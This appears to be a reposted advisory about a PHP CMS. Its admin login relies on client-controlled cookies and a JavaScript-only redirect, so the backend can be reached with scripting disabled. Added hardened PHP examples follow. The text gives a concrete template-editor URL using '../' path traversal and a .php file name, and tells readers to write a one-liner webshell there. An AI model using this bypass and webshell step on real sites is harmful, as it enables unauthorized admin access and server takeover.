A PHP CMS: cookie-authentication bypass (universal vulnerability) warning - The Black Bar Safety Net

ID MYHACK58:62201233247
Type myhack58
Reporter Anonymous
Modified 2012-03-04T00:00:00


Author: z2681

From: 90sec

The vulnerable file is admin_loginstate.php in the admin directory.

Look at the code:

    // ... (the if-condition preceding this branch is not shown on the page)
    echo "<script>window.location='admin_login.php'</script>";

} elseif ($_COOKIE['S_Login'] != md5($_COOKIE['S_AdminID'] . $_COOKIE['S_AdminUserName'] . $_COOKIE['S_AdminPassWord'] . $_COOKIE['S_Permission'])) {

    echo "<script>window.parent.location='admin_login.php'</script>";

}
?>

Very simple: as you can see, this is purely cookie-based authentication, and the only thing that sends a failed check back to the login page is a client-side script redirect. With JavaScript disabled the protected page is still served, so we go straight into the admin backend.
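Two defects combine here: the login state lives entirely in client-controlled cookies (an md5 over values the client itself supplies), and a failed check only emits a script redirect without stopping the page from rendering. The following is an added example, not the CMS's own code, showing the weak pattern beside a server-side session check that denies with an HTTP redirect and an exit; the cookie names are the ones from the advisory, the session keys and function names are assumptions.

```php
<?php
// Added example (not the CMS's own code): weak cookie check vs. hardened session check.

function weak_cookie_auth(array $cookie): bool
{
    // Vulnerable pattern from the advisory: every input to the hash comes from
    // the client, so the client can produce a matching S_Login for any
    // S_AdminID / S_Permission it likes. Nothing here proves a login happened.
    $required = ['S_Login', 'S_AdminID', 'S_AdminUserName', 'S_AdminPassWord', 'S_Permission'];
    foreach ($required as $name) {
        if (!isset($cookie[$name])) {
            return false;
        }
    }
    $expected = md5($cookie['S_AdminID'] . $cookie['S_AdminUserName']
                  . $cookie['S_AdminPassWord'] . $cookie['S_Permission']);
    return hash_equals($expected, $cookie['S_Login']);
}

function hardened_session_auth(): bool
{
    // Trust only server-side state: the browser holds an opaque session id,
    // identity and permission were stored in $_SESSION at login time
    // (session keys 'admin_id' and 'permission' are assumptions).
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    return !empty($_SESSION['admin_id']) && !empty($_SESSION['permission']);
}

function require_admin(): void
{
    if (!hardened_session_auth()) {
        // Redirect at the HTTP layer, then stop. The exit is the actual
        // control: a <script> redirect is a courtesy to the browser, and a
        // client with JavaScript off (or curl) would otherwise get the page.
        header('Location: admin_login.php', true, 302);
        exit;
    }
}

// Cookies worth setting at login (constructed values): HttpOnly, Secure,
// SameSite, and only the opaque session id, never identity or permissions.
function start_admin_session(int $adminId, string $permission): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Strict',
    ]);
    session_start();
    session_regenerate_id(true);      // new id on privilege change
    $_SESSION['admin_id']   = $adminId;
    $_SESSION['permission'] = $permission;
}
```

Usage: every admin page calls require_admin() before any output; the cookie-based check is kept only to show what the page's code is doing and should not be used.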

Once in the backend, a brief note on how to get a shell.

/admin/admin_template.php?action=templist&path=../skins/index/html/&tempname=default template&file=qingshen.php90

Directly access this URL and then write a one-liner into the file; the directory is of course /skins/index/html/.
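The template editor accepts a caller-supplied path and file name, so it can be steered outside the template tree and into a file with a server-executable extension. The following added example, not the CMS's own code, shows how a template editor would confine both parameters before touching the file system; TEMPLATE_ROOT, the function name and the allowed extensions are assumptions.

```php
<?php
// Added example (not the CMS's own code): confine a template path and file
// name to the template directory before reading or writing.

const TEMPLATE_ROOT = __DIR__ . '/templates';   // assumption

function resolve_template(string $path, string $file): ?string
{
    // Only a plain file name with a template extension is accepted; this is
    // what keeps a .php (or "php90"-style) name out of the template tree.
    if (!preg_match('/^[A-Za-z0-9_-]+\.(html|tpl)$/', $file)) {
        return null;
    }

    $root = realpath(TEMPLATE_ROOT);
    $dir  = realpath(TEMPLATE_ROOT . '/' . $path);
    if ($root === false || $dir === false || !is_dir($dir)) {
        return null;            // unknown directory or root not present
    }

    // realpath() collapses "../" segments, so a path that escapes the root
    // fails this prefix test even though it looked relative on the way in.
    $rootPrefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strpos($dir . DIRECTORY_SEPARATOR, $rootPrefix) !== 0) {
        return null;
    }

    return $dir . DIRECTORY_SEPARATOR . $file;
}

// Constructed calls for illustration:
//   resolve_template('default', 'index.html')        -> path under TEMPLATE_ROOT/default
//   resolve_template('../skins/index/html/', 'x.html') -> null (escapes the root)
//   resolve_template('default', 'shell.php')          -> null (extension not allowed)
```

The check runs on the resolved path rather than on the raw string, so encoded or doubled traversal sequences are handled the same way as a literal "../"; the extension allowlist is the second, independent layer.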